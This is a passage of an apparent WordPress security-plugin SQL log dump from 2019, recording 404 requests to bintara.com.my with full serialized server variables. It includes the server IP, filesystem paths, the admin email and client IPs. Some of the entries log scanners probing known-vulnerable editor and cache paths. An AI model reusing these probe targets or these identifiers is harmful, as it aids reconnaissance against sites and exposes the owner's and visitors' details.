Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"563C37A6-A4A3-4CC7-B11C-A1ED79F305CC\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0EgD3@-6BuXzuYs055@QAAAoE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"50209\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0EgD3@-6BuXzuYs055@QAAAoE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619968.9658\";s:12:\"REQUEST_TIME\";s:10:\"1571619968\";}}','notice','2019-10-21 01:06:11','2019-10-21 01:06:09',35663944,37465224,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28544,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E1580F19-78EA-4F78-9B2F-8D139C0D8760\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0GZj3@-6BuXzuYs057dAAAAoc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"65427\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0GZj3@-6BuXzuYs057dAAAAoc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571620454.6667\";s:12:\"REQUEST_TIME\";s:10:\"1571620454\";}}','notice','2019-10-21 01:14:17','2019-10-21 01:14:15',35668200,37464776,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28545,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"663-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"BF16B5AD-F30A-472F-A0BC-A366474E3B0E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.30.1013\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"663-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0IkD3@-6BuXzuYs059bAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49677\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0IkD3@-6BuXzuYs059bAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571621008.7915\";s:12:\"REQUEST_TIME\";s:10:\"1571621008\";}}','notice','2019-10-21 01:23:31','2019-10-21 01:23:29',35677960,37478072,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28546,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-cache.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-cache.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-cache.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0bNok4CZZwMupfWgiqcwAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-cache.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-cache.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0bNok4CZZwMupfWgiqcwAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"38894\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-cache.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-cache.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0bNok4CZZwMupfWgiqcwAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571625782.8306\";s:12:\"REQUEST_TIME\";s:10:\"1571625782\";}}','notice','2019-10-21 02:43:06','2019-10-21 02:43:03',35364760,37162288,'https://bintara.com.my/wp-cache.php',1,0,'193.106.30.99'),(28547,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/ueditor/net/controller.ashx\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:49:\"http://bintara.com.my/ueditor/net/controller.ashx\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0o3uChWqi2NVtnqluArgAAAgE\";s:12:\"REDIRECT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"111.181.66.109\";s:11:\"REMOTE_PORT\";s:5:\"65156\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:10:\"SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0o3uChWqi2NVtnqluArgAAAgE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629278.2269\";s:12:\"REQUEST_TIME\";s:10:\"1571629278\";}}','notice','2019-10-21 03:41:20','2019-10-21 03:41:18',34973152,36783816,'https://bintara.com.my/ueditor/net/controller.ashx',1,0,'111.181.66.109'),(28548,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/FCKeditor/fckconfig.js\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:44:\"http://bintara.com.my/FCKeditor/fckconfig.js\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0o3ok4CZZwMupfWgi3nQAAAAE\";s:12:\"REDIRECT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"111.181.66.109\";s:11:\"REMOTE_PORT\";s:5:\"65165\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:10:\"SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0o3ok4CZZwMupfWgi3nQAAAAE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629278.1851\";s:12:\"REQUEST_TIME\";s:10:\"1571629278\";}}','notice','2019-10-21 03:41:21','2019-10-21 03:41:18',35359504,37154560,'https://bintara.com.my/FCKeditor/fckconfig.js',1,0,'111.181.66.109'),(28549,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:39:\"/wp-includes/js/wp-emoji-release.min.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:61:\"https://bintara.com.my/wp-includes/js/wp-emoji-release.min.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:39:\"/wp-includes/js/wp-emoji-release.min.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pmIk4CZZwMupfWgi4mgAAAA4\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:61:\"https://bintara.com.my/wp-includes/js/wp-emoji-release.min.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:39:\"/wp-includes/js/wp-emoji-release.min.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pmIk4CZZwMupfWgi4mgAAAA4\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2536\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:61:\"https://bintara.com.my/wp-includes/js/wp-emoji-release.min.js\";s:10:\"SCRIPT_URL\";s:39:\"/wp-includes/js/wp-emoji-release.min.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pmIk4CZZwMupfWgi4mgAAAA4\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629464.6917\";s:12:\"REQUEST_TIME\";s:10:\"1571629464\";}}','notice','2019-10-21 03:44:27','2019-10-21 03:44:25',34977368,36775464,'https://bintara.com.my/wp-includes/js/wp-emoji-release.min.js',1,0,'219.92.69.151'),(28550,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/wp-includes/js/jquery/jquery-migrate.min.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-includes/js/jquery/jquery-migrate.min.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:44:\"/wp-includes/js/jquery/jquery-migrate.min.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pm4k4CZZwMupfWgi4ogAAABI\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-includes/js/jquery/jquery-migrate.min.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/wp-includes/js/jquery/jquery-migrate.min.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pm4k4CZZwMupfWgi4ogAAABI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REM